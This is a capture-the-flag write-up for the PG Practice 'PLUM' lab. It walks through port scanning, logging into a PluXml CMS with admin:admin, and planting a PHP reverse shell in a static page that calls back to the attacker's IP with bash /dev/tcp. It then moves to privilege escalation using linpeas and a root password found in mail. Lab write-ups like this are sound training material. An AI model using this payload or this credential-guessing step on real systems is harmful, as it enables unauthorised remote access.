Summary #
On port 80 there is a website running called PluXml which uses weak credentials to login. Once logged in we edit a page and put a PHP reverse shell command in it to get initial access. Once on the target we find that the www-data user has mail in /var/mail/www-data. There is an email containing the password for the root user.
Specifications #
- Name: PLUM
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Intermediate
- System overview: Linux plum 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 GNU/Linux
- IP address: 192.168.200.28
- OFFSEC provided credentials: None
- HASH:
local.txt:1e0f1f529fa04352e34a6e6a1ca9daa3 - HASH:
proof.txt:fd73c9e010334470dce33deb038041bb
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir plum && cd plum && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Aug 21 19:56 .
drwxrwxr-x 36 kali kali 4096 Aug 21 19:56 ..
drwxrwxr-x 2 kali kali 4096 Aug 21 19:56 enum
drwxrwxr-x 2 kali kali 4096 Aug 21 19:56 exploits
drwxrwxr-x 2 kali kali 4096 Aug 21 19:56 files
drwxrwxr-x 2 kali kali 4096 Aug 21 19:56 tools
drwxrwxr-x 2 kali kali 4096 Aug 21 19:56 uploads
## set bash variable
ip=192.168.200.28
## ping target to check if it's online
ping $ip
PING 192.168.200.28 (192.168.200.28) 56(84) bytes of data.
64 bytes from 192.168.200.28: icmp_seq=1 ttl=61 time=18.2 ms
64 bytes from 192.168.200.28: icmp_seq=2 ttl=61 time=19.3 ms
^C
--- 192.168.200.28 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 18.215/18.769/19.324/0.554 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.200.28:22
Open 192.168.200.28:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 19:57 CEST
Initiating Ping Scan at 19:57
Scanning 192.168.200.28 [4 ports]
Completed Ping Scan at 19:57, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:57
Completed Parallel DNS resolution of 1 host. at 19:57, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:57
Scanning 192.168.200.28 [2 ports]
Discovered open port 22/tcp on 192.168.200.28
Discovered open port 80/tcp on 192.168.200.28
Completed SYN Stealth Scan at 19:57, 0.06s elapsed (2 total ports)
Nmap scan report for 192.168.200.28
Host is up, received echo-reply ttl 61 (0.017s latency).
Scanned at 2025-08-21 19:57:22 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNEbgprJqVJa8R95Wkbo3cemB4fdRzos+v750LtPEnRs+IJQn5jcg5l89Tx4junU+AXzLflrMVo55gbuKeNTDtFRU9ltlIu4AU+f7lRlUlvAHlNjUbU/z3WBZ5ZU9j7Xc9WKjh1Ov7chC0UnDdyr5EGrIwlLzgk8zrWx364+S4JqLtER2/n0rhVxa9RCw0tR/oL24kMep4q7rFK6dThiRtQ9nsJFhh6yw8Fmdg7r4uohqH70UJurVwVNwFqtr/86e4VSSoITlMQPZrZFVvoSsjyL8LEODt1qznoLWudMD95Eo1YFSPID5VcS0kSElfYigjSr+9bNSdlzAof1mU6xJA67BggGNu6qITWWIJySXcropehnDAt2nv4zaKAUKc/T0ij9wkIBskuXfN88cEmZbu+gObKbLgwQSRQJIpQ+B/mA8CD4AiaTmEwGSWz1dVPp5Fgb6YVy6E4oO9ASuD9Q1JWuRmnn8uiHF/nPLs2LC2+rh3nPLXlV+MG/zUfQCrdrE=
| 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCUhhvrIBs53SApXKZYHWBlpH50KO3POt8Y+WvTvHZ5YgRagAEU5eSnGkrnziCUvDWNShFhLHI7kQv+mx+4R6Wk=
| 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4MSEXnpONsc0ANUT6rFQPWsoVmRW4hrpSRq++xySM9
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.56 ((Debian))
|_http-title: PluXml - Blog or CMS, XML powered !
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
|_http-favicon: Unknown favicon MD5: 2D58FC0104110AF4C9BE979DFD8FD83C
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.56 ((Debian))
|_http-title: PluXml - Blog or CMS, XML powered !
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
|_http-favicon: Unknown favicon MD5: 2D58FC0104110AF4C9BE979DFD8FD83C
On port 80 there is a website running called PluXml, at the bottom on the page (not shown) there is a link called Administration, click on it to get to the login page, otherwise go to this URL: http://192.168.200.28/core/admin/auth.php?p=/core/admin/.
The site uses weak credentials (admin:admin). So fill this in and press Enter of click Submit.
When we search the internet we can find: https://github.com/capture0x/PluXml-RCE/blob/main/PluXml.txt. This is an authenticated RCE. Once logged in we click on Edit, then we need to get our IP address and setup a listener. Once done, we can craft the payload.
## get local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.212/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::352b:1fc8:c1ce:fa22/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## setup listener
nc -lvnp 9001
listening on [any] 9001 ...
The payload we’re going to use is a PHP reverse shell command: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.212/9001 0>&1'");?>.
Once the payload is added, click on Save this page, followed by Back to static page list. Now click on See at the right of the screen, behind Edit or go to this URL: http://192.168.200.28/index.php?static1/static-1 and catch the reverse shell as the www-data user in the /var/www/html directory.
## catch the reverse shell
nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.212] from (UNKNOWN) [192.168.200.28] 60416
bash: cannot set terminal process group (720): Inappropriate ioctl for device
bash: no job control in this shell
www-data@plum:/var/www/html$
## find `local.txt` on the filesystem
www-data@plum:/var/www/html$ find / -iname 'local.txt' 2>/dev/null
/var/www/local.txt
## print `local.txt`
www-data@plum:/var/www/html$ cat /var/www/local.txt
1e0f1f529fa04352e34a6e6a1ca9daa3
Privilege Escalation #
To get a proper TTY we upgrade our shell using the script binary.
## determine location script binary
which script
/usr/bin/script
## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null
## after this command press the `enter` key twice
stty raw -echo ; fg ; reset
## run the following to be able to clear the screen and set the terrminal correct
www-data@plum:/var/www/html$ export TERM=xterm
www-data@plum:/var/www/html$ stty columns 200 rows 200
Now, upload linpeas.sh to the target and run it.
## change directory locally
cd uploads
## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
## get local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.212/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::352b:1fc8:c1ce:fa22/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start local webserver
python3 -m http.server 80
## on target
## change directory
www-data@plum:/var/www/html$ cd /var/tmp/
www-data@plum:/var/tmp$
## download `linpeas.sh`
www-data@plum:/var/tmp$ wget http://192.168.45.212/linpeas.sh
--2025-08-21 14:20:59-- http://192.168.45.212/linpeas.sh
Connecting to 192.168.45.212:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 956174 (934K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 0%[ linpeas.sh 77%[================================================================================linpeas.sh 100%[=============================================================================================================>] 933.76K 3.42MB/s in 0.3s
2025-08-21 14:21:00 (3.42 MB/s) - 'linpeas.sh' saved [956174/956174]
## set the execution bit
www-data@plum:/var/tmp$ chmod +x linpeas.sh
## run `linpeas.sh`
www-data@plum:/var/tmp$ ./linpeas.sh
The linpeas.sh output shows there is a mail file for the www-data user in: /var/mail/www-data. When we print this, there is a password for the root user, which we can use to escalate our privileges.
## print `/var/mail/www-data`
www-data@plum:/var/tmp$ cat /var/mail/www-data
<SNIP>
We are under attack. We've been targeted by an extremely complicated and sophisicated DDOS attack. I trust your skills. Please save us from this. Here are the credentials for the root user:
root:6s8kaZZNaZZYBMfh2YEW
Thanks,
Administrator
<SNIP>
## switch user to `root` and paste the password `6s8kaZZNaZZYBMfh2YEW` once asked
www-data@plum:/var/tmp$ su -
Password:
root@plum:~#
## print `proof.txt`
root@plum:~# cat /root/proof.txt
fd73c9e010334470dce33deb038041bb
References #
[+] https://github.com/capture0x/PluXml-RCE/blob/main/PluXml.txt
[+] https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh